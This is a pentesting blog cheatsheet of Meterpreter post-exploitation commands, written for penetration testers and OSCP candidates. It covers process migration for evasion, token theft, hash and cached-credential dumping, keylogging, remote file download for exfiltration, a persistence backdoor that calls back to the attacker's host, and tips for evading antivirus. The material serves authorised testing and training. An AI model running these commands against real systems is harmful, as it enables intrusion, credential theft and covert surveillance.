Meterpreter Commands Cheatsheet: Essential Post-Exploitation for Pentesters

Published April 29, 2026 · 2,310 words

The Meterpreter payload, part of the Metasploit Framework, is your go-to advanced, dynamic, and extensible post-exploitation agent. It gives you an interactive shell on a compromised system, enabling a wide array of actions from file system manipulation and network pivoting to privilege escalation and credential dumping. Think of it as your Swiss Army knife once you've gained initial access – it's designed specifically for post-exploitation tasks, offering capabilities far beyond a standard shell.

For any pentester, red teamer, or OSCP candidate, mastering Meterpreter commands is non-negotiable. It's the critical link between initial compromise and achieving your engagement objectives, whether that's maintaining persistence, exfiltrating data, or pivoting deeper into a network.

Getting Started with Meterpreter: Establishing Your Foothold

Before you can use Meterpreter commands, you need a Meterpreter session. This typically involves crafting a payload with tools like Msfvenom, delivering it to a target, and setting up a Metasploit listener (usually multi/handler) to catch the incoming connection. Once the target executes your payload, you'll see that glorious "Meterpreter session X opened" message, and you're in business.

From my experience, the initial setup can sometimes be the trickiest part, especially with antivirus solutions or network firewalls in play. Always test your payloads in isolated environments first to understand their behavior.

Key Takeaway: A Meterpreter session isn't just a shell; it's a powerful agent designed for sophisticated post-exploitation, making it indispensable for advanced offensive operations.

Core Meterpreter Commands: Your First Steps on a Compromised System

Once you've got a session, knowing where to start is key. These foundational commands help you get your bearings and begin interacting with the target.

Command	Description	Example Use Case
`help`	Displays all available Meterpreter commands, categorized.	`help` or `help stdapi` (for specific module)
`background`	Puts the current Meterpreter session into the background, returning you to the `msfconsole` prompt.	`background` (useful for managing multiple sessions)
`exit`	Terminates the current Meterpreter session.	`exit` (use when you're done with a session)
`sysinfo`	Gathers system information about the target, including OS, architecture, and uptime.	`sysinfo` (quick overview of the machine)
`getuid`	Shows the user that the Meterpreter session is currently running as.	`getuid` (essential for understanding your current privileges)
`getprivs`	Lists the privileges held by the current user context.	`getprivs` (check for admin rights, SeDebugPrivilege, etc.)
`idletime`	Returns the number of seconds the target system has been idle.	`idletime` (useful for determining user activity)

Essential Meterpreter Commands for Post-Exploitation Tactics

This is where Meterpreter truly shines. These commands let you move beyond initial access and perform common post-exploitation tasks, crucial for any red team engagement or Metasploit Post Exploitation scenario.

System Information and Reconnaissance with Meterpreter

Understanding your environment is paramount. Meterpreter offers several ways to gather intelligence on the compromised host.

ps: Lists all running processes with their PIDs, names, and associated users. This is invaluable for identifying interesting processes to migrate into or suspicious activity.
getpid: Displays the PID of the process Meterpreter is currently running in.
getsystem: Attempts to elevate privileges to SYSTEM. This is often a primary goal after initial access.
getenv: Shows environment variables. You might find sensitive paths or configuration details here.
reboot / shutdown: Remotely restarts or shuts down the compromised system. Use with caution!

File System Interaction: Moving Data In and Out

One of the most frequent tasks in post-exploitation is interacting with the target's file system. Meterpreter provides intuitive commands for this.

ls: Lists directory contents. Just like your familiar Linux ls.
cd <directory>: Changes the current working directory on the target.
pwd: Prints the current working directory on the target.
upload <local_file> <remote_path>: Uploads a file from your attacker machine to the target. This is how you might deliver additional tools or scripts.
download <remote_file> <local_path>: Downloads a file from the target to your attacker machine. Essential for exfiltrating data, logs, or configuration files.
mkdir <directory>: Creates a directory on the target.
rm <file>: Deletes a file on the target.
edit <file>: Edits a file on the target using a built-in text editor.
cat <file>: Displays the contents of a file.

Expert Tip: When uploading or downloading, always consider the file's permissions on the target and ensure your Meterpreter session has the necessary rights to read/write to the desired locations.

Network Pivoting and Port Forwarding with Meterpreter

Often, your initial compromise only gives you access to one machine. To move laterally or access internal services, you'll need to pivot. Meterpreter's networking commands are incredibly powerful for this.

ipconfig: Displays network interface information, including IP addresses and MAC addresses. Crucial for understanding network topology.
route: Manages the routing table on the target.
portfwd add -l <local_port> -p <remote_port> -r <remote_host>: Establishes a port forward. This lets you access services on a remote host (reachable by the compromised machine) through your local machine. For example, forward RDP (port 3389) from a machine deeper in the network to your local system.
portfwd list: Lists active port forwards.
portfwd delete -l <local_port> -p <remote_port> -r <remote_host>: Removes a specific port forward.

I've used portfwd countless times to access internal web servers, databases, or even RDP sessions that are otherwise inaccessible from my attacking machine. It's a cornerstone of lateral movement.

Process Management and Privilege Escalation

Gaining higher privileges is often a primary objective. Meterpreter helps you manage processes and elevate your standing.

migrate <PID>: Migrates the Meterpreter server to another process. This is a critical technique for stability and evasion. If your original process crashes or is terminated, your session will be lost. Migrating to a stable process (like explorer.exe or a service) significantly reduces this risk.
execute -f <executable> -H -i -c: Executes a command or executable on the target.
- -f: Specifies the executable.
- -H: Creates the process hidden from view.
- -i: Interacts with the process (useful for getting a shell).
- -c: Creates a new channel.
kill <PID>: Terminates a process.
steal_token <PID>: Attempts to steal the primary token of a process with higher privileges. If successful, your Meterpreter session will run under that user's context.
drop_token: Drops any stolen tokens, reverting to the original user context.

Credential Dumping with Meterpreter

One of the most valuable pieces of information you can get from a compromised system is credentials. Meterpreter provides modules to help with this.

hashdump: Attempts to dump the local SAM database hashes (LM and NTLM) from Windows systems. You'll usually need SYSTEM privileges for this.
run post/windows/gather/smart_hashdump: A more advanced module that tries various techniques to dump hashes.
run post/windows/gather/cachedump: Dumps cached domain credentials (MSCache).
run post/windows/gather/enum_logged_on_users: Lists users currently logged on to the system.

For even more advanced credential extraction, especially from memory, you'll often combine Meterpreter's capabilities with external tools. Our detailed guide on Mimikatz Dump Password: Extracting Credentials in Post-Exploitation covers this extensively.

Advanced Meterpreter Techniques and Modules

Meterpreter isn't just about basic commands; it's extensible through modules and scripts, allowing for complex operations.

Achieving Persistence

Maintaining access after a system reboot or user logout is crucial for red teams. Meterpreter has modules to help establish persistence.

run persistence -U -i <interval> -p <port> -r <LHOST>: This script creates a persistent backdoor on the target.
- -U: Installs as a user-level backdoor (runs at logon).
- -X: Installs as a system service (runs at boot).
- -i: Specifies the connection interval in seconds.
- -p: The port for the reverse connection.
- -r: Your listening host (LHOST).
Other persistence techniques involve creating scheduled tasks, modifying startup programs, or injecting into legitimate processes.

Screenshotting and Keylogging

Gathering visual and input data can be incredibly insightful during an engagement.

screenshot: Takes a screenshot of the target's desktop and saves it to your local machine. Useful for visual confirmation of user activity or sensitive data on screen.
keyscan_start: Starts recording keystrokes on the target.
keyscan_dump: Displays the collected keystrokes.
keyscan_stop: Stops the keylogger.

Token Impersonation and Session Hijacking

Windows tokens can be a goldmine for privilege escalation and lateral movement. Meterpreter allows you to manipulate them.

incognito module: Load it with load incognito.
- list_tokens -u: Lists available delegation and impersonation tokens.
- impersonate_token <token_name>: Impersonates a listed token, giving your Meterpreter session the privileges of that user. This is a common way to elevate privileges without credentials.

Migrating Processes for Stability and Evasion

As mentioned earlier, migrate <PID> is vital. But why exactly? If your initial exploit lands Meterpreter in a volatile process (like a browser tab that might close), migrating to a more stable process (explorer.exe, winlogon.exe, or a system service) ensures your session persists longer. It also helps evade detection, as the original process might be flagged, but a legitimate system process running Meterpreter might go unnoticed for a while.

Meterpreter Scripting and Automation

Meterpreter isn't just about individual commands; you can automate complex tasks using its run command with various post-exploitation modules or even custom scripts. These scripts often simplify common workflows, like gathering system information, extracting credentials, or setting up persistence with a single command.

run explorer: A simple example that opens explorer.
run getgui -e: Enables RDP on the target.
run post/multi/manage/autorun_post -r <module>: Automatically runs a post-exploitation module on newly opened Meterpreter sessions.

Learning to use these run commands effectively can dramatically speed up your post-exploitation phase, allowing you to focus on analysis rather than repetitive manual tasks.

Meterpreter Best Practices and OSCP Prep

For anyone preparing for the OSCP exam or working in a professional pentesting environment, how you use Meterpreter matters just as much as knowing the commands.

Always Migrate: Seriously, make migrate your second command after sysinfo. Move to a stable, preferably system-owned, process. This saves you from losing precious sessions.
Take Screenshots: Document your findings. Screenshots prove impact and help you remember what you saw.
Be Stealthy: Avoid using noisy commands unnecessarily. Clean up any artifacts (files uploaded, logs modified) if it's within your scope.
Document Everything: Keep a running log of commands you use, output you see, and any credentials or hashes you find. This is crucial for reports and for the OSCP exam.
Understand Context: Always know what user context you're in (getuid, getprivs) and what network segment you're on (ipconfig). This informs your next move.
Practice, Practice, Practice: The best way to master Meterpreter is to use it in various scenarios. Set up vulnerable VMs and practice different post-exploitation paths.

On the OSCP exam, Meterpreter is a tool, not a solution. You'll need to know *when* and *how* to use its commands to achieve specific objectives. It's often a stepping stone to further exploitation, like using gathered hashes for lateral movement via Pass-the-Hash, or leveraging a shell to compile and run custom privilege escalation exploits. For more on preparing for the exam, consider our guide on Mastering OSCP Exam Preparation: Your Blueprint to Certification.

Troubleshooting Common Meterpreter Issues

Things don't always go smoothly in the world of pentesting. Here are some common Meterpreter hiccups and how to deal with them:

Session Dies Immediately: This usually points to a payload issue. The target's antivirus or EDR might be killing it. Try different encoding (msfvenom -e), different payload types (staged vs. stageless), or a different exploit. It could also be process instability; try migrating immediately if you get a brief window.
Commands Not Working: Check your privileges (getuid, getprivs). Many commands require elevated rights (e.g., SYSTEM for hashdump). Also, ensure you've loaded necessary modules (e.g., load incognito for token manipulation).
Network Issues (Portfwd not working): Verify network connectivity from the compromised host to the target host for the forward. Check firewalls on both the compromised host and your attacker machine. Sometimes, changing the local port for the forward helps.
"Operation failed" or "Error": This is generic, but often means permission denied or the target resource doesn't exist. Double-check paths, filenames, and user privileges.

Bottom Line: Meterpreter is an incredibly powerful agent, but it's not magic. Understanding the underlying operating system and network principles will help you troubleshoot effectively.

Mastering Meterpreter commands transforms your initial shell into a full-fledged control center. It's a critical component of the post-exploitation phase, giving you the tools to explore, exfiltrate, and escalate. Keep this cheatsheet handy, but more importantly, get hands-on experience. The more you use it, the more intuitive and effective your post-exploitation efforts will become. Happy hunting!

Metasploit Meterpreter Wiki MITRE ATT&CK - Meterpreter

Frequently Asked Questions

What is Meterpreter in Metasploit?

Meterpreter is an advanced, in-memory, dynamic payload that provides an interactive shell on a compromised system. It's specifically designed for post-exploitation tasks, offering extensive capabilities for file system interaction, network pivoting, privilege escalation, and more, all within the Metasploit Framework.

How do I get a Meterpreter session?

You typically obtain a Meterpreter session by crafting a malicious payload (often with Msfvenom), delivering it to a target system, and then setting up a Metasploit listener (like multi/handler) to catch the incoming connection when the target executes the payload.

What are the most important Meterpreter commands for OSCP?

For OSCP, focus on commands for system information (sysinfo, getuid, getprivs), file system interaction (ls, cd, upload, download), process management (ps, migrate), network pivoting (ipconfig, portfwd), and credential gathering (hashdump, load incognito, impersonate_token). The ability to use getsystem and establish persistence is also crucial.

Can Meterpreter bypass antivirus?

Meterpreter payloads, especially default ones, can often be detected by antivirus (AV) software. However, various techniques like encoding payloads (e.g., with Msfvenom encoders), using different payload types (stageless), or employing custom evasion methods can help bypass AV. It's a constant cat-and-mouse game between attackers and security vendors.